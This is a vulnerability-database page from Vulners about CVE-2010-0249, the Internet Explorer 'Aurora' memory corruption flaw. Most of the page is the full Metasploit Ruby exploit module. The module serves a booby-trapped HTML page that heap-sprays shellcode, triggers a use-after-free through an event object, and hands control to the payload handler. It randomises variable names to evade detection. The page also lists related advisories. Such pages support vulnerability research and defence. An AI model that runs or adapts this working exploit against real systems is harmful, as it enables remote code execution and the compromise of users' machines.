Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Internet Explorer "Aurora" Memory Corruption

🗓️ 18 Jan 2010 00:00:00Reported by metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 60 Views

Microsoft Internet Explorer "Aurora" Memory Corruption This module exploits a memory corruption flaw in Internet Explorer found in the wild

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS Internet Explorer Aurora Exploit
17 Jan 201000:00
zdt
canvas		Immunity Canvas: AURORA_FLASH
15 Jan 201017:30
canvas
Circl		CVE-2010-0249
17 Jan 201000:00
circl
CISA KEV Catalog		Microsoft Internet Explorer Use-After-Free Vulnerability
20 May 202600:00
cisa_kev
CISA		 CISA Adds Seven Known Exploited Vulnerabilities to Catalog
20 May 202612:00
cisa
Check Point Advisories		Preemptive Protection against Microsoft Internet Explorer Invalid Pointer Reference Remote Code Execution Vulnerability (MS10-002)
17 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Internet Explorer Invalid Pointer Reference Memory Corruption (CVE-2010-0249)
17 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Trojan: Aurora.Hydraq (CVE-2010-0249)
27 Jan 201000:00
checkpoint_advisories
Check Point Advisories		Microsoft Internet Explorer HTML Object Memory Corruption Vulnerability Use After Free - Ver2 (CVE-2010-0249)
16 Apr 201400:00
checkpoint_advisories
CVE		CVE-2010-0249
15 Jan 201017:00
cve
Rows per page
`##  
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::IE,  
:ua_minver => "6.0",  
:ua_maxver => "8.0",  
:javascript => true,  
:os_name => OperatingSystems::WINDOWS,  
:vuln_test => nil, # no way to test without just trying it  
})  
  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption',  
'Description' => %q{  
This module exploits a memory corruption flaw in Internet Explorer. This  
flaw was found in the wild and was a key component of the "Operation Aurora"  
attacks that lead to the compromise of a number of high profile companies. The  
exploit code is a direct port of the public sample published to the Wepawet  
malware analysis site. The technique used by this module is currently identical  
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'unknown',  
'hdm' # Metasploit port  
],  
'Version' => '$Revision: 8140 $',  
'References' =>  
[  
['CVE', '2010-0249'],  
['OSVDB', '61697'],  
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],  
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']  
  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00",  
'Compat' =>  
{  
'ConnectionType' => '-find',  
},  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { }],  
],  
'DisclosureDate' => 'Jan 14 2009', # wepawet sample  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
  
if (request.uri.match(/\.gif/i))  
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]  
send_response(cli, data, { 'Content-Type' => 'image/gif' })  
return  
end  
  
var_memory = rand_text_alpha(rand(100) + 1)  
var_boom = rand_text_alpha(rand(100) + 1)  
var_x1 = rand_text_alpha(rand(100) + 1)  
var_e1 = rand_text_alpha(rand(100) + 1)  
var_e2 = rand_text_alpha(rand(100) + 1)  
  
var_comment = rand_text_alpha(rand(100) + 1);  
var_abc = rand_text_alpha(3);  
  
var_ev1 = rand_text_alpha(rand(100) + 1)  
var_ev2 = rand_text_alpha(rand(100) + 1)  
var_sp1 = rand_text_alpha(rand(100) + 1)  
  
var_unescape = rand_text_alpha(rand(100) + 1)  
var_shellcode = rand_text_alpha(rand(100) + 1)  
var_spray = rand_text_alpha(rand(100) + 1)  
var_start = rand_text_alpha(rand(100) + 1)  
var_i = rand_text_alpha(rand(100) + 1)  
  
rand_html = rand_text_english(rand(400) + 500)  
  
html = %Q|<html>  
<head>  
<script>  
  
var #{var_comment} = "COMMENT";  
  
var #{var_x1} = new Array();  
for (i = 0; i < 200; i ++ ){  
#{var_x1}[i] = document.createElement(#{var_comment});  
#{var_x1}[i].data = "#{var_abc}";  
};  
  
var #{var_e1} = null;  
  
var #{var_memory} = new Array();  
var #{var_unescape} = unescape;  
  
function #{var_boom}() {  
  
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');  
  
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );  
  
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );  
  
for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};  
}  
  
function #{var_ev1}(evt){  
#{var_boom}();  
#{var_e1} = document.createEventObject(evt);  
document.getElementById("#{var_sp1}").innerHTML = "";  
window.setInterval(#{var_ev2}, 50);  
}  
  
function #{var_ev2}(){  
p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";  
for (i = 0; i < #{var_x1}.length; i ++ ){  
#{var_x1}[i].data = p;  
}  
  
var t = #{var_e1}.srcElement;  
}  
</script>  
</head>  
<body>  
  
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>  
  
</body>  
</html>  
|  
  
print_status("Sending #{self.name} to client #{cli.peerhost}")  
# Transmit the compressed response to the client  
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })  
  
# Handle the payload  
handler(cli)  
end  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jan 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.88788
memory corruptioninternet exploreroperation aurorametasploit frameworkremotebrowserautopwn
60